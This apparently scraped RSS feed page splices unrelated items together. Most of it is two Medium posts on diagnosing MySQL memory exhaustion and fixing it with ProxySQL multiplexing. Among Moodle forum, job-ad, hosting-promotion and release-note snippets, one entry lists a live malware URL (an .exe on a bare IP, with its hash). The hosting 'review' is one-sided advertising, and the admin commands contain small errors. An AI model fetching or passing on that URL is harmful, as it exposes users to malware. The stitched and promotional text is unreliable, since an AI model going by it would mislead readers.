|+----------+---------------+----------+ #There is a Bug in this view. The Username column is actually showing the schemaname and the schemaname column is showing usernames. I have reported this bug in proxySQL's github repo. https://github.com/sysown/proxysql/issues/1720 Force ProxySQL to use multiplex: There are few cases proxysql will disable the multiplexing. Particularly all queries that have @ in their query_digest will disable multiplexing. Collect the queries which has @ SELECT DISTINCT digest, digest_textFROM stats_mysql_query_digestWHERE digest_text LIKE '%@%' \G; *************************** 1. row *************************** digest: 0xA8F2FFB14312850Cdigest_text: SELECT @@max_allowed_packet *************************** 2. row *************************** digest: 0x7CDEEF2FF695B7F8digest_text: SELECT @@session.tx_isolation *************************** 3. row *************************** digest: 0x2B838C3B5DE79958digest_text: SELECT @@session.auto_increment_increment AS auto_increment_increment, @@character_set_client AS character_set_client, @@character_set_connection AS character_set_connection, @@character_set_results AS character_set_results, @@character_set_server AS character_set_server, @@init_connect AS init_connect, @@interactive_timeout AS interactive_timeout, @@license AS license, @@lower_case_table_names AS lower_case_table_names, @@max_allowed_packet AS max_allowed_packet, @@net_buffer_length AS net_buffer_length, @@net_write_timeout AS net_write_timeout, @@query_cache_size AS query_cache_size, @@query_cache_type AS query_cache_type, @@sql_mode AS sql_mode, @@system_time_zone AS system_time_zone, @@time_zone AS time_zone, @@tx_isolation AS tx_isolation, @@wait_timeout AS wait_timeout Finally, the above statements are executed by prepared statements. These queries are by default disabled the multiplexing. But ProxySQL has another cool feature that we can allow these queries (which has @ ) to use multiplexing. Run the below query to set proxysql to use multiplexing for these queries. We can insert it by Query pattern or query digest. # Add multiplexing to a query using query_text INSERT INTO mysql_query_rules (active, match_digest, multiplex)VALUES('1', '^SELECT @@session.tx_isolation', 2);INSERT INTO mysql_query_rules (active, match_digest, multiplex)VALUES('1', '^SELECT @@max_allowed_packet', 2); # Add multiplexing to a query using query Diagest INSERT INTO mysql_query_rules (active, digest, multiplex)VALUES('1', '0x2B838C3B5DE79958', 2); # Save it to Runtime and Disk LOAD MYSQL QUERY RULES TO RUNTIME;SAVE MYSQL QUERY RULES TO DISK; Restart ProxySQL: If we enabled multiplexing in proxySQL then its mandatory to restart ProxySQL service or close all the existing connections and open it as a new one. service proxysql restart Lets check the active prepared statements in both ProxySQL and MySQL. #proxySQL SELECT *FROM stats_mysql_globalWHERE variable_name LIKE '%stmt%'; +--------------------------+----------------+| Variable_Name | Variable_Value |+--------------------------+----------------+| Stmt_Client_Active_Total | 6 |+--------------------------+----------------+ #mysqlshow status like 'Prepared_stmt_count';+---------------------+-------+| Variable_name | Value |+---------------------+-------+| Prepared_stmt_count | 166 |+---------------------+-------+ The number of Prepared_stmt_count is dramatically reduced from 20000 to 200. But why there is a different count between proxySQL and mysql? Again refer to the ProxySQL’s doc. Once whenever a connection executed 20 statements, then only it’ll Close that prepared statement. In ProxySQL, its showing active statements. But MySQL is showing active + executed statements count. Number of Backend connections: After this change, there is a sudden drop in a number of backend connections in the ProxySQL. This proves that the statements which disable the multiplexing will create more backend connections. MySQL’s Memory: Now we can see the explanation for this blog title. See the below graph which is showing the high memory drop. The two main parts where mysql used more memory: mysql connections. Prepared statements. We all already knows that each mysql connection requires some amount of memory. And for prepared statements, I have explained about its memory consumption in my previous blog. Conclusion: ProxySQL has a lot of great features. Multiplexing is good. But after this incident only we realize that multiplexing will help to reduce the number of backend connections and MySQL’s memory utilization as well. I hope if you are a DBA you will read this and implement it in your environment as well. If it helped for you then feel free to give your claps. Reduce MySQL Memory Utilization With ProxySQL Multiplexing was originally published in Searce Engineering on Medium, where people are continuing the conversation by highlighting and responding to this story.
          How max_prepared_stmt_count bring down the production MySQL system      Cache   Translate Page      
MySQL Adventures: How max_prepared_stmt_count can bring down production We recently moved an On-Prem environment to GCP for better scalability and availability. The customer’s main database is MySQL. Due to the nature of customer’s business, it’s a highly transactional workload (one of the hot startups in APAC). To deal with the scale and meet availability requirements, we have deployed MySQL behind ProxySQL — which takes care of routing some of the resource intensive SELECTs to chosen replicas. The setup consists of: One Master Two slaves One Archive database server Post migration to GCP, everything was nice and calm for a couple of weeks, until MySQL decided to start misbehaving and leading to an outage. We were able to quickly resolve and bring the system back online and what follows are lessons from this experience. The configuration of the Database: CentOS 7. MySQL 5.6 32 Core CPU 120GB Memory 1 TB SSD for MySQL data volume. The total database size is 40GB. (yeah, it is small in size, but highly transactional) my.cnf is configured using Percona’s configuration wizard. All tables are InnoDB Engine No SWAP partitions. The Problem It all started with an alert that said MySQL process was killed by Linux’s OOM Killer. Apparently MySQL was rapidly consuming all the memory (about 120G) and OOM killer perceived it as a threat to the stability of the system and killed the process. We were perplexed and started investigating. Sep 11 06:56:39 mysql-master-node kernel: Out of memory: Kill process 4234 (mysqld) score 980 or sacrifice child Sep 11 06:56:39 mysql-master-node kernel: Killed process 4234 (mysqld) total-vm:199923400kB, anon-rss:120910528kB, file-rss:0kB, shmem-rss:0kB Sep 11 06:57:00 mysql-master-node mysqld: /usr/bin/mysqld_safe: line 183: 4234 Killed nohup /usr/sbin/mysqld --basedir=/usr --datadir=/mysqldata --plugin-dir=/usr/lib64/mysql/plugin --user=mysql --log-error=/var/log/mysqld.log --open-files-limit=65535 --pid-file=/var/run/mysqld/mysqld.pid --socket=/mysqldata/mysql.sock < /dev/null > /dev/null 2>&1 Naturally, we started looking at mysql configuration to see if something is off. InnoDB Parameters: innodb-flush-method = O_DIRECTinnodb-log-files-in-group = 2innodb-log-file-size = 512Minnodb-flush-log-at-trx-commit = 1innodb-file-per-table = 1innodb-buffer-pool-size = 100G Other Caching Parameters: tmp-table-size = 32Mmax-heap-table-size = 32Mquery-cache-type = 0query-cache-size = 0thread-cache-size = 50open-files-limit = 65535table-definition-cache = 4096table-open-cache = 50 We are not really using query cache and one of the heavy front end service is PHP Laravel. Here is the memory utilization graph. The three highlighted areas are the points at which we had issues in production. The second issue happened very shortly, so we reduced the innodb-buffer-pool-size to 90GB. But even though the memory utilization never came down. So we scheduled a cronjob to flush OS Cache at least to give some addition memory to the Operating system by using the following command. This was a temporary measure till we found the actual problem. sync; echo 3 > /proc/sys/vm/drop_cache But This didn’t help really. The memory was still growing and we had to look at what’s really inside the OS Cache? Fincore: There is a tool called fincore helped me find out what’s actually the OS cache held. Its actually using Perl modules. use the below commands to install this. yum install perl-Inline rpm -ivh http://fr2.rpmfind.net/linux/dag/redhat/el6/en/x86_64/dag/RPMS/fincore-1.9-1.el6.rf.x86_64.rpm It never directly shows what files are inside the buffer/cache. We instead have to manually give the path and it’ll check what files are in the cache for that location. I wanted to check about Cached files for the mysql data directory. cd /mysql-data-directory fincore -summary * > /tmp/cache_results Here is the sample output of the cached files results. page size: 4096 bytesauto.cnf: 1 incore page: 0dbadmin: no incore pages.Eztaxi: no incore pages.ibdata1: no incore pages.ib_logfile0: 131072 incore pages: 0 1 2 3 4 5 6 7 8 9 10......ib_logfile1: 131072 incore pages: 0 1 2 3 4 5 6 7 8 9 10......mysql: no incore pages.mysql-bin.000599: 8 incore pages: 0 1 2 3 4 5 6 7mysql-bin.000600: no incore pages.mysql-bin.000601: no incore pages.mysql-bin.000602: no incore pages.mysql-bin.000858: 232336 incore pages: 0 1 2 3 4 5 6 7 8 9 10......mysqld-relay-bin.000001: no incore pages.mysqld-relay-bin.index: no incore pages.mysql-error.log: 4 incore pages: 0 1 2 3mysql-general.log: no incore pages.mysql.pid: no incore pages.mysql-slow.log: no incore pages.mysql.sock: no incore pages.ON: no incore pages.performance_schema: no incore pages.mysql-production.pid: 1 incore page: 0 6621994 pages, 25.3 Gbytes in core for 305 files; 21711.46 pages, 4.8 Mbytes per file. The highlighted points show the graph when OS Cache is cleared.How we investigated this issue: The first document that everyone refers is How mysql uses the memory from MySQL’s documentation. So we started with where are all the places that mysql needs memory. I’ll explain this about in a different blog. Lets continue with the steps which we did. Make sure MySQL is the culprit: Run the below command and this will give you the exact memory consumption about MySQL. ps --no-headers -o "rss,cmd" -C mysqld | awk '{ sum+=$1 } END { printf ("%d%s\n", sum/NR/1024,"M") }' 119808M Additional Tips: If you want to know each mysql’s threads memory utilization, run the below command. # Get the PID of MySQL:ps aux | grep mysqld mysql 4378 41.1 76.7 56670968 47314448 ? Sl Sep12 6955:40 /usr/sbin/mysqld --basedir=/usr --datadir=/mysqldata --plugin-dir=/usr/lib64/mysql/plugin --user=mysql --log-error=/var/log/mysqld.log --open-files-limit=65535 --pid-file=/var/run/mysqld/mysqld.pid --socket=/mysqldata/mysql.sock # Get all threads memory usage:pmap -x 4378 4378: /usr/sbin/mysqld --basedir=/usr --datadir=/mysqldata --plugin-dir=/usr/lib64/mysql/plugin --user=mysql --log-error=/var/log/mysqld.log --open-files-limit=65535 --pid-file=/var/run/mysqld/mysqld.pid --socket=/mysqldata/mysql.sockAddress Kbytes RSS Dirty Mode Mapping0000000000400000 11828 4712 0 r-x-- mysqld000000000118d000 1720 760 476 rw--- mysqld000000000133b000 336 312 312 rw--- [ anon ]0000000002b62000 1282388 1282384 1282384 rw--- [ anon ]00007fd4b4000000 47816 37348 37348 rw--- [ anon ]00007fd4b6eb2000 17720 0 0 ----- [ anon ]00007fd4bc000000 48612 35364 35364 rw--- [ anon ]...........................00007fe1f0075000 2044 0 0 ----- libpthread-2.17.so00007fe1f0274000 4 4 4 r---- libpthread-2.17.so00007fe1f0275000 4 4 4 rw--- libpthread-2.17.so00007fe1f0276000 16 4 4 rw--- [ anon ]00007fe1f027a000 136 120 0 r-x-- ld-2.17.so00007fe1f029c000 2012 2008 2008 rw--- [ anon ]00007fe1f0493000 12 4 0 rw-s- [aio] (deleted)00007fe1f0496000 12 4 0 rw-s- [aio] (deleted)00007fe1f0499000 4 0 0 rw-s- [aio] (deleted)00007fe1f049a000 4 4 4 rw--- [ anon ]00007fe1f049b000 4 4 4 r---- ld-2.17.so00007fe1f049c000 4 4 4 rw--- ld-2.17.so00007fe1f049d000 4 4 4 rw--- [ anon ]00007ffecc0f1000 132 72 72 rw--- [ stack ]00007ffecc163000 8 4 0 r-x-- [ anon ]ffffffffff600000 4 0 0 r-x-- [ anon ]---------------- ------- ------- ------- total kB 122683392 47326976 47320388 InnoDB Buffer Pool: Initially we suspected the InnoDB. We have checked the innoDB usage from the monitoring system. But the result was negative. It never utilized more than 40GB. That thickens the plot. If buffer pool only has 40 GB, who is eating all that memory? Is this correct? Does Buffer Pool only hold 40GB? What’s Inside the BufferPool and whats its size? SELECT page_type AS page_type, sum(data_size) / 1024 / 1024 AS size_in_mbFROM information_schema.innodb_buffer_pageGROUP BY page_typeORDER BY size_in_mb DESC; +-------------------+----------------+| Page_Type | Size_in_MB |+-------------------+----------------+| INDEX | 39147.63660717 || IBUF_INDEX | 0.74043560 || UNDO_LOG | 0.00000000 || TRX_SYSTEM | 0.00000000 || ALLOCATED | 0.00000000 || INODE | 0.00000000 || BLOB | 0.00000000 || IBUF_BITMAP | 0.00000000 || EXTENT_DESCRIPTOR | 0.00000000 || SYSTEM | 0.00000000 || UNKNOWN | 0.00000000 || FILE_SPACE_HEADER | 0.00000000 |+-------------------+----------------+ A quick guide about this query. INDEX: B-Tree index IBUF_INDEX: Insert buffer index UNKNOWN: not allocated / unknown state TRX_SYSTEM: transaction system data Bonus: To get the buffer pool usage by index SELECT table_name AS table_name, index_name AS index_name, count(*) AS page_count, sum(data_size) / 1024 / 1024 AS size_in_mbFROM information_schema.innodb_buffer_pageGROUP BY table_name, index_nameORDER BY size_in_mb DESC; Then where mysql was holding the Memory? We checked all of the mysql parts where its utilizing memory. Here is a rough calculation for the memory utilization during the mysql crash. BufferPool: 40GBCache/Buffer: 8GBPerformance_schema: 2GBtmp_table_size: 32MOpen tables cache for 50 tables: 5GBConnections, thread_cache and others: 10GB Almost it reached 65GB, we can round it as 70GB out of 120GB. But still its approximate only. Something is wrong right? My DBA mind started to think where is the remaining? Till now, MySQL is the culprit who is consuming all of the memory. Clearing OS cache never helped. Its fine. Buffer Pool is also in healthy state. Other memory consuming parameters are looks good. It’s time to Dive into the MySQL. Lets see what kind of queries are running into the mysql. show global status like 'Com_%';+---------------------------+-----------+| Variable_name | Value |+---------------------------+-----------+| Com_admin_commands | 531242406 || Com_stmt_execute | 324240859 || Com_stmt_prepare | 308163476 || Com_select | 689078298 || Com_set_option | 108828057 || Com_begin | 4457256 || Com_change_db | 600 || Com_commit | 8170518 || Com_delete | 1164939 || Com_flush | 80 || Com_insert | 73050955 || Com_insert_select | 571272 || Com_kill | 660 || Com_rollback | 136654 || Com_show_binlogs | 2604 || Com_show_slave_status | 31245 || Com_show_status | 162247 || Com_show_tables | 1105 || Com_show_variables | 10428 || Com_update | 74384469 |+---------------------------+-----------+ Select, Insert, Update these counters are fine. But a huge amount of prepared statements were running into the mysql. One more Tip: Valgrind Valgrind is a powerful open source tool to profile any process’s memory consumption by threads and child processes. Install Valgrind: # You need C compilers, so install gcc wget ftp://sourceware.org/pub/valgrind/valgrind-3.13.0.tar.bz2tar -xf valgrind-3.13.0.tar.bz2 cd valgrind-3.13.0./configure makemake install Note: Its for troubleshooting purpose, you should stop MySQL and Run with Valgrind. Create an log file to Capture touch /tmp/massif.outchown mysql:mysql /tmp/massif.outchmod 777 /tmp/massif.out Run mysql with Valgrind /usr/local/bin/valgrind --tool=massif --massif-out-file=/tmp/massif.out /usr/sbin/mysqld –default-file=/etc/my.cnf Lets wait for 30mins (or till the mysql takes the whole memory). Then kill the Valgranid and start mysql as normal. Analyze the Log: /usr/local/bin/ms_print /tmp/massif.out We’ll explain mysql memory debugging using valgrind in an another blog. Memory Leak: We have verified all the mysql parameters and OS level things for the memory consumption. But no luck. So I started to think and search about mysql’s memory leak parts. Then I found this awesome blog by Todd. Yes, the only parameter I didn’t check is max_prepared_stmt_count. What is this? From MySQL’s Doc, This variable limits the total number of prepared statements in the server. It can be used in environments where there is the potential for denial-of-service attacks based on running the server out of memory by preparing huge numbers of statements. Whenever we prepared a statement, we should close in the end. Else it’ll not the release the memory which is allocated to it. For executing a single query, it’ll do three executions (Prepare, Run the query and close). There is no visibility that how much memory is consumed by a prepared statement. Is this the real root cause? Run this query to check how many prepared statements are running in mysql server. mysql> show global status like 'com_stmt%'; +-------------------------+-----------+| Variable_name | Value |+-------------------------+-----------+| Com_stmt_close | 0 || Com_stmt_execute | 210741581 || Com_stmt_fetch | 0 || Com_stmt_prepare | 199559955 || Com_stmt_reprepare | 1045729 || Com_stmt_reset | 0 || Com_stmt_send_long_data | 0 |+-------------------------+-----------+ You can see there are 1045729 prepared statements are running and the Com_stmt_close variables is showing none of the statements are closed. This query will return the max count for the preparements. mysql> show variables like 'max_prepared_stmt_count';+-------------------------+---------+| Variable_name | Value |+-------------------------+---------+| max_prepared_stmt_count | 1048576 |+-------------------------+---------+ Oh, its the maximum value for this parameter. Then we immediately reduced it to 2000. mysql> set global max_prepared_stmt_count=2000; -- Add this to my.cnfvi /etc/my.cnf [mysqld]max_prepared_stmt_count = 2000 Now, the mysql is running fine and the memory leak is fixed. Till now the memory utilization is normal. In Laravel framework, its almost using this prepared statement. We can see so many laravel + prepare statements questions in StackOverflow. Conclusion: The very important lesson as a DBA I learned is, before setting up any parameter value check the consequences of modifying it and make sure it should not affect the production anymore. Now the mysql side is fine, but the application was throwing the below error. Can't create more than max_prepared_stmt_count statements (current value: 20000) To continue about this series, the next blog post will explain how we fixed the above error using multiplexing and how it helped to dramatically reduce the mysql’s memory utilization. How max_prepared_stmt_count bring down the production MySQL system was originally published in Searce Engineering on Medium, where people are continuing the conversation by highlighting and responding to this story.
          moodle site crash after plugin installation      Cache   Translate Page      
by Γεώργιος Σάλαρης.  

Hello

I work on a moodle platform and i tried to install a theme plugin. The installation was successfull but when i tried to update the database it got stuck and from then i get the message thta appears below.

My error log in cpanel shows the information as shown below.


I am kind of desperate because i tried some thing i found here for example delete the theme folder. 

I also went through the file explorer and there is no such file as lib.php in the path /cache/lib.

I would appreciate every thought and help.

Thank you in advance.  


Moodle version is 2.9

PHP version 5.3.26

Apache version 2.4.29

MySql version 5.6.36 - 82.1


          185.231.155.180      Cache   Translate Page      
URL: 185.231.155.180/mysqlconf.exe, IP Address: 185.231.155.180, Country: RU, ASN: 48282, MD5: fac6ab167e1b02c2e1465ae88fb8fcdc
          Emails being sent to customers who are in the mysql?      Cache   Translate Page      

@Dez wrote:

How do you do it, so that emails get auto sent to customers at certain intervals (GDPR allowing)?

Their names and addresses would have been entered into the sql when they signed up as a customer.

Also, how do I add names and addresses manually to that sql db as well please?

Posts: 1

Participants: 1

Read full topic


          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Mulesoft developer      Cache   Translate Page      
IN-Indianapolis, Position- Mulesoft Developer Location- Indianapolis IN Dutation- Long Term contract Mulesoft Consultant with 10+ Years of experience. Mule Batch, JMS,CXF Webservices, SOAP and Rest Web Services, Java, MySQL, MULEESB, Any point Studio, Mule server 3.8.0, MMC, Jenkins, JIRA, Confluence, Kibana, Git Hub, ForgeRock, Java8, Spring, Munit, Active MQ
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          MySQL/PHP programmeur      Cache   Translate Page      
Algemeen: Wij zijn een energie advies bureau en hebben o.a. een energie monitoring website voor bedrijven. Voor het vernieuwen van deze website zijn wij op zoek naar een goede MySQL/PHP programmeur die met ons mee kan denken. Werkzaamheden: - Vernieuwen van oude database door een nieuwe database (MySQL)...
          Medoo 更新至 1.6,增加并优化了部分方法功能      Cache   Translate Page      

Medoo版本直接更新至1.6,对初始化及部分方法进行了调整及优化。同时,本次还增加了兼容不同数据库的随机获取方法。本次更新的亮点主要是:

A、改进初始化,Medoo 1.6增加了更多初始化时的连接选项,比如,增加collation选项以及对MSSQL增加appname选项。同时,现在可以允许用户使用声明的PDO对象进行初始化。
B、增加一个新API方法rand(),可以实现多数据库兼容的随机数据获取。 
C、在info()方法中增加了输出DSN字符串的信息项,可以方便查看调试数据库连接信息。
D、改进了部分代码功能。比如get()方法未查询到结果时由原来的返回False改进成返回NULL。
E、修正了部分Bug。如:修正了匹配关键字仅支持MySQL的问题、修改了执行自定义DSN连接时的一些问题。

Medoo是一款超轻量级的PHP SQL数据库开发框架,提供了简单,易学,灵活的API,提升开发Web应用的效率与性能,而且体积只有100KB不到的一个文件。

Medoo下载地址:https://github.com/catfan/Medoo/archive/master.zip


          EXPERT Core PHP Developer for calling app at server level      Cache   Translate Page      
I'm looking for an expert Core PHP Developer who can work on server for a calling mobile app. Also needs to add some technical feature for mobile calling app at server in PHP. (Budget: ₹12500 - ₹37500 INR, Jobs: General Labor, Javascript, Mobile App Development, MySQL, PHP)
          I need two websites.      Cache   Translate Page      
Everything is to be done by you guys I need am amazing work in short time there is no limit in budget but the time must be least I need only the best programmer. (Budget: €10000 - €20000 EUR, Jobs: MySQL, Software Architecture, Software Testing, Web Hosting, Website Testing)
          Episode 284: Buffalo Overflow | TechSNAP 284      Cache   Translate Page      

Massive drive failures after a datacenter gas attack. A critical MySQL vulnerability you should know about & is Cisco responsible for the death of an MMO?

Plus great questions, our answers & much more!

#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000
          Episode 224: Butterflies & Backronyms | TechSNAP 224      Cache   Translate Page      

The Backronym vulnerability hits MySQL right in the SSL protection, we’ll share the details. The hacker Group that hit Apple & Microsoft intensifies their attacks & a survey shows many core Linux tools are at risk.

Plus some great questions, a rockin' roundup & much much more!

#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000
          AMTRON Recruitment 2018 : Systems Officer/ Systems Assistant [18 posts], Apply Online      Cache   Translate Page      
Assam Electronics Development Corporation Limited (AMTRON)
Last Date: 23/10/2018.


Assam Electronics Development Corporation Limited (AMTRON) invites applications from eligible candidates for engagement as Technical Manpower (Information Technology) on contract basis in various District and Sub-divisional Courts of Assam under 14th Finance Commission Grants. The employment is purely contractual in nature and the terms of contract shall come to an end on 31st March,2020.

1. Systems Officer
No of posts:
9
Educational Qualification: BE or B.Tech (Computer Science/Information Technology/ Electronics & Communication /Electronics & Telecommunication / Electronics & Instrumentation/ Electronics & Electricals/Telecommunication/ Instrumentation) or MCA or MSc(Computer Science/Information Technology/ Electronics & Communication /Electronics & Telecommunication / Electronics & Instrumentation/ Electronics & Electricals/Telecommunication/ Instrumentation)

Experience: 1 Year experience in software development in PHP/Java and Postgresql/MySQL environment, Android and IOS Mobile App development, Technical Troubleshooting & support in Hardware/Software implementation.

2. Systems Assistant
No of posts:
9
Educational Qualification: B.C.A or B.Sc. (Physics/Mathematics) with 1 year Post Graduate Diploma in Computer Science / Applications or DOECC `A` Level or Diploma holders (3 years) from Polytechnic in Computer Science/Engineering.

Experience: Knowledge in Server Administration/LAN/DBA/Technical troubleshooting support in Hardware.

Pay: The engagement is on monthly fixed pay basis including EPF contribution for the entire period of engagement. The breakup of pay and EPF is as shown below.

i) Systems Officer:
Monthly fixed pay: Rs. 15985.00
EPF Contributions per month: Rs. 3600.00

ii) Systems Assistant:
Monthly fixed pay: Rs. 10750.00
EPF Contributions per month: Rs. 2580.00
The EPF contributions shall be deposited to the individual EPF Accounts of the incumbents.

Selection Procedure: Online applications will be shortlisted on the basis of the eligibility criteria and list of such shortlisted candidates will be uploaded in the website www.amtron.in. The shortlisted candidates will be called for test/viva-voce through downloadable call letters. Selection Committee(s) will be constituted for test/viva-voce. Selection of the candidates will be done on the basis of their performance in test/viva-voce and experience. No TA/DA will be entertained for appearing in any test/viva-voce.

How to apply: Interested and eligible candidates may apply only online for the same, through the official website of the Corporation (www.amtron.in) from 09.10.2018 to 23.10.2018. A candidate can apply only ONLINE through website www.amtron.in. No other mode of application is acceptable. The online application can be uploaded following the typical steps as mentioned below:

• Visit www.amtron.in
• Click on the link Recruitment and then click Apply Online against this Notification
• Register yourself into the portal
• Login using your Registration No.
• Fill-up and submit the online application form

Important Dates :
Opening Date for submission on line application: 09/10/2018 10:00AM
Last Date for submission on line application: 23/10/2018 11:59PM
Uploading shortlist of candidates for test/viva-voce: To be notified later
For shortlisted candidates, downloading of call letter and date & venue of test/viva-voce will be informed later.

Advertisement Details: Pl check here .

          aws Engineer|6-9 years|Hyderabad - Capgemini - Hyderabad, Telangana      Cache   Translate Page      
Experience with SQL and NoSQL DBs such as SQL, MySQL, Amazon DynamoDB. Hiring AWS Engineer with Certification and Solution Architect experience....
From Capgemini - Wed, 26 Sep 2018 05:22:40 GMT - View all Hyderabad, Telangana jobs
          MysqlToDB2      Cache   Translate Page      

MysqlToDB2 è una utilità concepita per la conversione immediata di dati. Consente in particolare di trasformare database MySQL in DB2, […]

Leggi MysqlToDB2


          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          WindowsASPNETHosting.in vs Square Brothers : Who is the Best ASP.NET Core 2.1.4 Hosting in India?      Cache   Translate Page      

Choosing an ASP.NET Core 2.1.4 Hosting service in India among thousands of providers can be a hard thing for the majority of webmasters at present. They already know that a bad hosting service coming with frequent downtime, security issues, and poor technical support can be a nightmare, but still find no way out for a quality option.

Both WindowsASPNETHosting.in and Square Brothers have the great popularity in Windows hosting field. WindowsASPNETHosting.in covers various web hosting services like, Windows hosting, shared hosting and performance hosting. On the other hand, Square Brothers, as a professional web hosting India, puts everything on offering premium ASP.NET Core 2.1.4 Hosting service. According to the recent market research, as for ASP.NET (windows) hosting, HostForLIFE.eu takes more advantageous places.

How to Choose the Best ASP.NET Core 2.1.4 Hosting in India?

This time we would like to work out a comprehensive comparison of this web hosts to figure out whether WindowsASPNETHosting.in really have strengths to win Square Brothers for a long term. After testing two hosting plans from the two web hosting providers, we compare WindowsASPNETHosting.in with Square Brothers from several aspects, including pricing, feature, uptime, speed and technical support. To begin with, please refer to the following rating table.

Additionally, they have many similarities and highlights which make people confused when making a choice between them. When it comes to choosing the right ASP.NET 5 hosting plan, to a great extent, you take price and usability into consideration. In order to eliminate your confusion, we aim to work out an unbiased and conductive comparison between WindowsASPNETHosting.in and Square Brothers.

To complete this comparison, we have respectively applied and monitored WindowsASPNETHosting.in and Square Brothers with our websites for months. After monitoring the 2 packages for months and reviewing thousands of users' comments, we complete the following in-depth comparison covering pricing, technical support and other performances.

ASP.NET Core 2.1.4 Hosting Review on Price

Both of WindowsASPNETHosting.in and Square Brothers offer affordable plans.

http://windowsaspnethosting.in/
WindowsASPNETHosting.in
Square Brothers

ASP.NET Core 2.1.4 Hosting Review on Feature

The two plans have rich features to help you manage websites efficiently and effectively. WindowsASPNETHosting.in provides high quality affordable India's Windows hosting services for personal and companies of all sizes. Host your website with an innovative, reliable, and a friendly India's Windows hosting company who cares about your business. To be exactly, WindowsASPNETHosting.in with the latest ASP.NET framework and excellent ASP components offers you many tools to run sites smoothly. As for Classic PLAN it is one of its main strengths to offer you access to one-click installs for app like WordPress, Drupal and Zencart, etc. Moreover, it carries many latest server technologies covering PHP 5.6.13 and MySQL 5.7. 
WindowsASPNETHosting.in Features
Square Brothers's Windows Web Hosting Plans starts with minimum disk space of 5000 MB Disk Space and 20000 MB Bandwidth. All their Windows hosting plans comes with great Control Panel, the fastest control panel to manage your hosting account. You can run both ASP and PHP websites. ASP.NET, Crystal Reports, MSSQL and MySql. 

Review on Performance

Having been offering ASP.NET Core 2.1.4 Hosting, WindowsASPNETHosting.in has received trust and popularity from thousands of webmasters. This company powers their US-based and India-based data centers with high performance network infrastructures and servers, redundant connections and handprint entry system. Therefore, WindowsASPNETHosting.in can deliver fast network speed and more than 99.9% uptime. Also, Square Brothers is a company who tries their best to realize 99.9% uptime. Square Brothers has a staff of 300 employees, more than 1.5 million active services and over 275,000 clients.

Review on Technical Support

In terms of customer service, both WindowsASPNETHosting.in and Square Brothers guarantee to provide friendly and professional customer service via email. Obviously, the technical support is available 7 days a week and 24 hours a day. The two companies own a team of experienced and professional technical staffs who can offer offhanded assistance no matter when you need. Besides, WindowsASPNETHosting.in stores many useful resources on knowledgebase which can give you a hand if you want to know some basic skills and message about the way of building and managing your website.

WindowsASPNETHosting.in is The Best & Cheap Windows Hosting in India

Based on our all-around comparison above, we have found that both WindowsASPNETHosting.in and Square Brothers are generally good choice. After several days of review on a large number of web hosting companies, we recommend WindowsASPNETHosting.in which offer cost-effective shared hosting plans in India. 
http://windowsaspnethosting.in/ASPNET-Shared-Hosting-Plans-India

          Nhân Viên Lập Trình Java & Php      Cache   Translate Page      
Tp Hồ Chí Minh - - Co' kinh nghiệm/kiê'n thư'c về ngôn ngữ lập trình: JAVA, C#, PHP, JavaScript. - Có kinh nghiệm HTML5, CSS, Jquery, Bootstrap..., Codeigniter - Sử dụng các hệ Cơ sở dữ liệu: MySQL, Postgres, MSSQL. - Có kỹ năng lập trình hướng đối tượng - Có kinh nghiệm làm ứng dụng Socket...
          Développeur backend - R et D - Tundra Technical - Saint-Roch, QC      Cache   Translate Page      
Programmation C#, MySQL, XML, Node.js, HTML, JS, Rest. Développeur Back End – RetD....
From Indeed - Thu, 30 Aug 2018 14:50:49 GMT - View all Saint-Roch, QC jobs
          Website Redesign and Development - Upwork      Cache   Translate Page      
I am looking for the redesign and development of my current website. The website is: http://innoviusmigration.com/. The website has 2 main sections
http://au.innoviusmigration.com/
http://nz.innoviusmigration.com/
au.innoviusmigration is set as the bydefault home page.
I am looking for new, conversion focused, modern, high end, fully responsive professional website with customized design and coding. The live chat feature would not be there in new website.
The content of website will remain almost same. Please note that they are 2 main sections for 2 different countries. Design and layout would remain almost same, with only difference in content.

Apart from the website, I am also looking for landing page for each of the above 2 sections.

Your quotation should include the following:
1) Price for the project
2) Timeline for the project. I am strictly looking to complete the project on time.
3) 10 best projects you have done. If you are a company, send me the projects of your staff who will be working on my project.
4) Years of work experience in website design and development.
You quotation will not be considered without the above.

Budget: $500
Posted On: October 10, 2018 05:48 UTC
ID: 214414970
Category: Web, Mobile & Software Dev > Web Development
Skills: AngularJS, CSS, CSS3, HTML, HTML5, JavaScript, jQuery, MySQL Administration, PHP, Web Design, Website Development, WordPress
Country: Australia
click to apply
          Paulo Talin - Travel Agency Website      Cache   Translate Page      
I need a Travel Agency website with checking or booking system - optional online purchase - marketplace/split system (by service provider option/contract) or client charging by service supplier after approved checking or booking... (Budget: $1500 - $3000 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Add a feature to ownCloud      Cache   Translate Page      
I have ownCloud installed on my server. Now I would like to connect my various Onedrive for Business accounts with my ownCloud and mount them as external storage. It should be possible to access Onedrive from my ownCloud and also be able to move or delete files... (Budget: €8 - €30 EUR, Jobs: Apache, Javascript, Linux, MySQL, PHP)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
